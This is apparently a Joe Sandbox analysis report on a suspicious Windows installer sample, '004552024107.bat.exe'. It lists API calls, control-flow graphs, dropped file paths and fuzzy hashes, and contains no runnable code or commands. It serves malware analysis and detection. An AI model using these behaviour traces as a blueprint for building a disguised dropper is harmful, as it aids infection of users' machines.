                                            • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405606
                                            • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405614
                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405627
                                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405649
                                            • ShowWindow.USER32(?,00000008), ref: 0040565D
                                            • GetDlgItem.USER32(?,000003EC), ref: 0040567E
                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040568E
                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004056A7
                                            • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004056B3
                                            • GetDlgItem.USER32(?,000003F8), ref: 0040558C
                                              • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                            • GetDlgItem.USER32(?,000003EC), ref: 004056CF
                                            • CreateThread.KERNELBASE(00000000,00000000,Function_000054A3,00000000), ref: 004056DD
                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004056E4
                                            • ShowWindow.USER32(00000000), ref: 00405707
                                            • ShowWindow.USER32(?,00000008), ref: 0040570E
                                            • ShowWindow.USER32(00000008), ref: 00405754
                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405788
                                            • CreatePopupMenu.USER32 ref: 00405799
                                            • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004057AE
                                            • GetWindowRect.USER32(?,000000FF), ref: 004057CE
                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004057E7
                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405823
                                            • OpenClipboard.USER32(00000000), ref: 00405833
                                            • EmptyClipboard.USER32 ref: 00405839
                                            • GlobalAlloc.KERNEL32(00000042,?), ref: 00405842
                                            • GlobalLock.KERNEL32(00000000), ref: 0040584C
                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405860
                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405879
                                            • SetClipboardData.USER32(00000001,00000000), ref: 00405884
                                            • CloseClipboard.USER32 ref: 0040588A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                            • String ID:
                                            • API String ID: 4154960007-0
                                            • Opcode ID: 6894e9f90bc875501daf67bea02dd23ffdb3990ae2fac1508e671bbf89fa6b9e
                                            • Instruction ID: 4cf6c47baa67300a2587cb91bb909ead9d18e5d8973f7e879562a42f7fe873d6
                                            • Opcode Fuzzy Hash: 6894e9f90bc875501daf67bea02dd23ffdb3990ae2fac1508e671bbf89fa6b9e
                                            • Instruction Fuzzy Hash: 58A16A71A00609FFDB11AFA0DE89EAE7BB9EB44354F40403AFA44B61A0C7754D51DF68
                                            APIs
                                              • Part of subcall function 6D0E12A5: GlobalAlloc.KERNELBASE(00000040,6D0E12C3,?,6D0E135F,-6D0E504B,6D0E11C0,-000000A0), ref: 6D0E12AD
                                            • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 6D0E1C54
                                            • lstrcpyA.KERNEL32(00000008,?), ref: 6D0E1C9C
                                            • lstrcpyA.KERNEL32(00000408,?), ref: 6D0E1CA6
                                            • GlobalFree.KERNEL32(00000000), ref: 6D0E1CB9
                                            • GlobalFree.KERNEL32(?), ref: 6D0E1D99
                                            • GlobalFree.KERNEL32(?), ref: 6D0E1D9E
                                            • GlobalFree.KERNEL32(?), ref: 6D0E1DA3
                                            • GlobalFree.KERNEL32(00000000), ref: 6D0E1F8A
                                            • lstrcpyA.KERNEL32(?,?), ref: 6D0E2128
                                            • GetModuleHandleA.KERNEL32(00000008), ref: 6D0E21A4
                                            • LoadLibraryA.KERNEL32(00000008), ref: 6D0E21B5
                                            • GetProcAddress.KERNEL32(?,?), ref: 6D0E220E
                                            • lstrlenA.KERNEL32(00000408), ref: 6D0E2228
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1269749952.000000006D0E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D0E0000, based on PE: true
                                            • Associated: 00000000.00000002.1269707159.000000006D0E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1269794266.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1269831918.000000006D0E6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6d0e0000_004552024107.jbxd
                                            Similarity
                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                            • String ID:
                                            • API String ID: 245916457-0
                                            • Opcode ID: 081a40987ccbbb2224abf945cfb853079d4ba00064f85755c5d92164ac528772
                                            • Instruction ID: 755d8784d30dcf8a55f17e402aa5dcf024d4b4ce5cb6e4acd0495ee22facad49
                                            • Opcode Fuzzy Hash: 081a40987ccbbb2224abf945cfb853079d4ba00064f85755c5d92164ac528772
                                            • Instruction Fuzzy Hash: F222AD71D5860BDEEB21CFB8C8807ADBBF4BB05395F50852ED1A5E3280D7749681CB92

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 737 405a4f-405a75 call 405d0d 740 405a77-405a89 DeleteFileA 737->740 741 405a8e-405a95 737->741 742 405c18-405c1c 740->742 743 405a97-405a99 741->743 744 405aa8-405ab8 call 40628d 741->744 745 405bc6-405bcb 743->745 746 405a9f-405aa2 743->746 752 405ac7-405ac8 call 405c66 744->752 753 405aba-405ac5 lstrcatA 744->753 745->742 749 405bcd-405bd0 745->749 746->744 746->745 750 405bd2-405bd8 749->750 751 405bda-405be2 call 406620 749->751 750->742 751->742 760 405be4-405bf8 call 405c1f call 405a07 751->760 755 405acd-405ad0 752->755 753->755 758 405ad2-405ad9 755->758 759 405adb-405ae1 lstrcatA 755->759 758->759 761 405ae6-405b04 lstrlenA FindFirstFileA 758->761 759->761 776 405c10-405c13 call 4053d1 760->776 777 405bfa-405bfd 760->777 763 405b0a-405b21 call 405c4a 761->763 764 405bbc-405bc0 761->764 770 405b23-405b27 763->770 771 405b2c-405b2f 763->771 764->745 766 405bc2 764->766 766->745 770->771 773 405b29 770->773 774 405b31-405b36 771->774 775 405b42-405b50 call 40628d 771->775 773->771 779 405b38-405b3a 774->779 780 405b9b-405bad FindNextFileA 774->780 787 405b52-405b5a 775->787 788 405b67-405b72 call 405a07 775->788 776->742 777->750 782 405bff-405c0e call 4053d1 call 406066 777->782 779->775 783 405b3c-405b40 779->783 780->763 785 405bb3-405bb6 FindClose 780->785 782->742 783->775 783->780 785->764 787->780 790 405b5c-405b65 call 405a4f 787->790 796 405b93-405b96 call 4053d1 788->796 797 405b74-405b77 788->797 790->780 796->780 799 405b79-405b89 call 4053d1 call 406066 797->799 800 405b8b-405b91 797->800 799->780 800->780
                                            APIs
                                            • DeleteFileA.KERNELBASE(?,?,76D53410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe"), ref: 00405A78
                                            • lstrcatA.KERNEL32(0042B490,\*.*,0042B490,?,?,76D53410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe"), ref: 00405AC0
                                            • lstrcatA.KERNEL32(?,0040A014,?,0042B490,?,?,76D53410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe"), ref: 00405AE1
                                            • lstrlenA.KERNEL32(?,?,0040A014,?,0042B490,?,?,76D53410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe"), ref: 00405AE7
                                            • FindFirstFileA.KERNEL32(0042B490,?,?,?,0040A014,?,0042B490,?,?,76D53410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe"), ref: 00405AF8
                                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405BA5
                                            • FindClose.KERNEL32(00000000), ref: 00405BB6
                                            Strings
                                            • "C:\Users\user\Desktop\004552024107.bat.exe", xrefs: 00405A58
                                            • \*.*, xrefs: 00405ABA
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: "C:\Users\user\Desktop\004552024107.bat.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                            • API String ID: 2035342205-1910283544
                                            • Opcode ID: 78f2e0e18cb785759574f080630192df6ebe3391163db671d7f5c390f5c48f83
                                            • Instruction ID: da8d20c05f1c1589987c6f576fa29bd8846dab181693994c0c241c39a5f8a394
                                            • Opcode Fuzzy Hash: 78f2e0e18cb785759574f080630192df6ebe3391163db671d7f5c390f5c48f83
                                            • Instruction Fuzzy Hash: 3051C030904A04BADB21AB618C85FAF7AB8EF42754F14417FF445B11D2C77C6982DEAE
                                            APIs
                                            • FindFirstFileA.KERNELBASE(76D53410,0042BCD8,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,00405D50,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,76D53410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,76D53410,C:\Users\user\AppData\Local\Temp\), ref: 0040662B
                                            • FindClose.KERNEL32(00000000), ref: 00406637
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\nsj7426.tmp, xrefs: 00406620
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID: C:\Users\user\AppData\Local\Temp\nsj7426.tmp
                                            • API String ID: 2295610775-3895652539
                                            • Opcode ID: 5cd1aebe143dc129e49842c5f71a26c727f8c2dbc53d2570feaf901eef8a8c0e
                                            • Instruction ID: 21071efbed15a2f64541de492f8ee2fd881da0b051754d52d90be6cd238fbd17
                                            • Opcode Fuzzy Hash: 5cd1aebe143dc129e49842c5f71a26c727f8c2dbc53d2570feaf901eef8a8c0e
                                            • Instruction Fuzzy Hash: 08D012355490205BC64017396F0C85BBA599F163717118E37F8A6F12E0CB758C7296DC

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 203 403e33-403e45 204 403e4b-403e51 203->204 205 403fac-403fbb 203->205 204->205 206 403e57-403e60 204->206 207 40400a-40401f 205->207 208 403fbd-404005 GetDlgItem * 2 call 40432d SetClassLongA call 40140b 205->208 209 403e62-403e6f SetWindowPos 206->209 210 403e75-403e7c 206->210 212 404021-404024 207->212 213 40405f-404064 call 404379 207->213 208->207 209->210 215 403ec0-403ec6 210->215 216 403e7e-403e98 ShowWindow 210->216 218 404026-404031 call 401389 212->218 219 404057-404059 212->219 221 404069-404084 213->221 224 403ec8-403eda DestroyWindow 215->224 225 403edf-403ee2 215->225 222 403f99-403fa7 call 404394 216->222 223 403e9e-403eb1 GetWindowLongA 216->223 218->219 238 404033-404052 SendMessageA 218->238 219->213 220 4042fa 219->220 232 4042fc-404303 220->232 229 404086-404088 call 40140b 221->229 230 40408d-404093 221->230 222->232 223->222 231 403eb7-403eba ShowWindow 223->231 233 4042d7-4042dd 224->233 235 403ee4-403ef0 SetWindowLongA 225->235 236 403ef5-403efb 225->236 229->230 242 4042b8-4042d1 DestroyWindow EndDialog 230->242 243 404099-4040a4 230->243 231->215 233->220 241 4042df-4042e5 233->241 235->232 236->222 244 403f01-403f10 GetDlgItem 236->244 238->232 241->220 245 4042e7-4042f0 ShowWindow 241->245 242->233 243->242 246 4040aa-4040f7 call 406320 call 40432d * 3 GetDlgItem 243->246 247 403f12-403f29 SendMessageA IsWindowEnabled 244->247 248 403f2f-403f32 244->248 245->220 275 404101-40413d ShowWindow KiUserCallbackDispatcher call 40434f EnableWindow 246->275 276 4040f9-4040fe 246->276 247->220 247->248 249 403f34-403f35 248->249 250 403f37-403f3a 248->250 252 403f65-403f6a call 404306 249->252 253 403f48-403f4d 250->253 254 403f3c-403f42 250->254 252->222 256 403f83-403f93 SendMessageA 253->256 258 403f4f-403f55 253->258 254->256 257 403f44-403f46 254->257 256->222 257->252 261 403f57-403f5d call 40140b 258->261 262 403f6c-403f75 call 40140b 258->262 273 403f63 261->273 262->222 271 403f77-403f81 262->271 271->273 273->252 279 404142 275->279 280 40413f-404140 275->280 276->275 281 404144-404172 GetSystemMenu EnableMenuItem SendMessageA 279->281 280->281 282 404174-404185 SendMessageA 281->282 283 404187 281->283 284 40418d-4041c7 call 404362 call 403e14 call 40628d lstrlenA call 406320 SetWindowTextA call 401389 282->284 283->284 284->221 295 4041cd-4041cf 284->295 295->221 296 4041d5-4041d9 295->296 297 4041f8-40420c DestroyWindow 296->297 298 4041db-4041e1 296->298 297->233 300 404212-40423f CreateDialogParamA 297->300 298->220 299 4041e7-4041ed 298->299 299->221 301 4041f3 299->301 300->233 302 404245-40429c call 40432d GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 300->302 301->220 302->220 307 40429e-4042b1 ShowWindow call 404379 302->307 309 4042b6 307->309 309->233
                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E6F
                                            • ShowWindow.USER32(?), ref: 00403E8F
                                            • GetWindowLongA.USER32(?,000000F0), ref: 00403EA1
                                            • ShowWindow.USER32(?,00000004), ref: 00403EBA
                                            • DestroyWindow.USER32 ref: 00403ECE
                                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403EE7
                                            • GetDlgItem.USER32(?,?), ref: 00403F06
                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403F1A
                                            • IsWindowEnabled.USER32(00000000), ref: 00403F21
                                            • GetDlgItem.USER32(?,00000001), ref: 00403FCC
                                            • GetDlgItem.USER32(?,00000002), ref: 00403FD6
                                            • SetClassLongA.USER32(?,000000F2,?), ref: 00403FF0
                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00404041
                                            • GetDlgItem.USER32(?,00000003), ref: 004040E7
                                            • ShowWindow.USER32(00000000,?), ref: 00404108
                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040411A
                                            • EnableWindow.USER32(?,?), ref: 00404135
                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040414B
                                            • EnableMenuItem.USER32(00000000), ref: 00404152
                                            • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040416A
                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 0040417D
                                            • lstrlenA.KERNEL32(0042A488,?,0042A488,00000000), ref: 004041A7
                                            • SetWindowTextA.USER32(?,0042A488), ref: 004041B6
                                            • ShowWindow.USER32(?,0000000A), ref: 004042EA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                            • String ID:
                                            • API String ID: 121052019-0
                                            • Opcode ID: 6d7623d9db7cd4b2b8523d1bb3db3e3d74f302aff2fe3ff677a931fada95a4e0
                                            • Instruction ID: 7c61018aff81ba8050a36ffdf8d01ac8e149416bf37329b2a87c27abd1a4edd3
                                            • Opcode Fuzzy Hash: 6d7623d9db7cd4b2b8523d1bb3db3e3d74f302aff2fe3ff677a931fada95a4e0
                                            • Instruction Fuzzy Hash: 60C1F4B1600205ABD7206F61EE49E2B3BBCEB85749F51053EF681B11F1CB799842DB2D

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 310 403a96-403aae call 4066b5 313 403ab0-403ac0 call 4061eb 310->313 314 403ac2-403af3 call 406174 310->314 322 403b16-403b3f call 403d5b call 405d0d 313->322 318 403af5-403b06 call 406174 314->318 319 403b0b-403b11 lstrcatA 314->319 318->319 319->322 328 403b45-403b4a 322->328 329 403bc6-403bce call 405d0d 322->329 328->329 330 403b4c-403b70 call 406174 328->330 335 403bd0-403bd7 call 406320 329->335 336 403bdc-403c01 LoadImageA 329->336 330->329 340 403b72-403b74 330->340 335->336 338 403c82-403c8a call 40140b 336->338 339 403c03-403c33 RegisterClassA 336->339 353 403c94-403c9f call 403d5b 338->353 354 403c8c-403c8f 338->354 341 403d51 339->341 342 403c39-403c7d SystemParametersInfoA CreateWindowExA 339->342 344 403b85-403b91 lstrlenA 340->344 345 403b76-403b83 call 405c4a 340->345 347 403d53-403d5a 341->347 342->338 348 403b93-403ba1 lstrcmpiA 344->348 349 403bb9-403bc1 call 405c1f call 40628d 344->349 345->344 348->349 352 403ba3-403bad GetFileAttributesA 348->352 349->329 356 403bb3-403bb4 call 405c66 352->356 357 403baf-403bb1 352->357 363 403ca5-403cbf ShowWindow call 406647 353->363 364 403d28-403d29 call 4054a3 353->364 354->347 356->349 357->349 357->356 371 403cc1-403cc6 call 406647 363->371 372 403ccb-403cdd GetClassInfoA 363->372 367 403d2e-403d30 364->367 369 403d32-403d38 367->369 370 403d4a-403d4c call 40140b 367->370 369->354 375 403d3e-403d45 call 40140b 369->375 370->341 371->372 373 403cf5-403d18 DialogBoxParamA call 40140b 372->373 374 403cdf-403cef GetClassInfoA RegisterClassA 372->374 380 403d1d-403d26 call 4039e6 373->380 374->373 375->354 380->347
                                            APIs
                                              • Part of subcall function 004066B5: GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
                                              • Part of subcall function 004066B5: GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                                            • lstrcatA.KERNEL32(1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,76D53410,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\004552024107.bat.exe",0000000A,0000000C), ref: 00403B11
                                            • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes,1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,76D53410), ref: 00403B86
                                            • lstrcmpiA.KERNEL32(?,.exe), ref: 00403B99
                                            • GetFileAttributesA.KERNEL32(Call,?,"C:\Users\user\Desktop\004552024107.bat.exe",0000000A,0000000C), ref: 00403BA4
                                            • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes), ref: 00403BED
                                              • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                            • RegisterClassA.USER32(0042E7C0), ref: 00403C2A
                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C42
                                            • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C77
                                            • ShowWindow.USER32(00000005,00000000,?,"C:\Users\user\Desktop\004552024107.bat.exe",0000000A,0000000C), ref: 00403CAD
                                            • GetClassInfoA.USER32(00000000,RichEdit20A,0042E7C0), ref: 00403CD9
                                            • GetClassInfoA.USER32(00000000,RichEdit,0042E7C0), ref: 00403CE6
                                            • RegisterClassA.USER32(0042E7C0), ref: 00403CEF
                                            • DialogBoxParamA.USER32(?,00000000,00403E33,00000000), ref: 00403D0E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: "C:\Users\user\Desktop\004552024107.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                            • API String ID: 1975747703-2144183142
                                            • Opcode ID: 9de4ba4982955c39501ca71976a9485f8cd52ade1bb06ecee508862ffe36d889
                                            • Instruction ID: 062707365540321fd28ddc31094d52b8ee002564e62880c3064c6a51a35bf8f0
                                            • Opcode Fuzzy Hash: 9de4ba4982955c39501ca71976a9485f8cd52ade1bb06ecee508862ffe36d889
                                            • Instruction Fuzzy Hash: 1A61B4706442006EE620BF629D46F273ABCEB44B49F44443FF945B62E2DB7D99068A3D

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 384 402f31-402f7f GetTickCount GetModuleFileNameA call 405e20 387 402f81-402f86 384->387 388 402f8b-402fb9 call 40628d call 405c66 call 40628d GetFileSize 384->388 389 403161-403165 387->389 396 4030a4-4030b2 call 402ecd 388->396 397 402fbf 388->397 403 4030b4-4030b7 396->403 404 403107-40310c 396->404 399 402fc4-402fdb 397->399 401 402fdd 399->401 402 402fdf-402fe8 call 40337a 399->402 401->402 411 40310e-403116 call 402ecd 402->411 412 402fee-402ff5 402->412 406 4030b9-4030d1 call 403390 call 40337a 403->406 407 4030db-403105 GlobalAlloc call 403390 call 403168 403->407 404->389 406->404 435 4030d3-4030d9 406->435 407->404 433 403118-403129 407->433 411->404 413 403071-403075 412->413 414 402ff7-40300b call 405ddb 412->414 421 403077-40307e call 402ecd 413->421 422 40307f-403085 413->422 414->422 431 40300d-403014 414->431 421->422 424 403094-40309c 422->424 425 403087-403091 call 40676c 422->425 424->399 432 4030a2 424->432 425->424 431->422 437 403016-40301d 431->437 432->396 438 403131-403136 433->438 439 40312b 433->439 435->404 435->407 437->422 440 40301f-403026 437->440 441 403137-40313d 438->441 439->438 440->422 442 403028-40302f 440->442 441->441 443 40313f-40315a SetFilePointer call 405ddb 441->443 442->422 444 403031-403051 442->444 447 40315f 443->447 444->404 446 403057-40305b 444->446 448 403063-40306b 446->448 449 40305d-403061 446->449 447->389 448->422 450 40306d-40306f 448->450 449->432 449->448 450->422
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402F42
                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\004552024107.bat.exe,00000400,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F5E
                                              • Part of subcall function 00405E20: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\004552024107.bat.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                              • Part of subcall function 00405E20: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                            • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\004552024107.bat.exe,C:\Users\user\Desktop\004552024107.bat.exe,80000000,00000003,?,?,00403722,?,?,00000008), ref: 00402FAA
                                            • GlobalAlloc.KERNELBASE(00000040,00000008,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 004030E0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
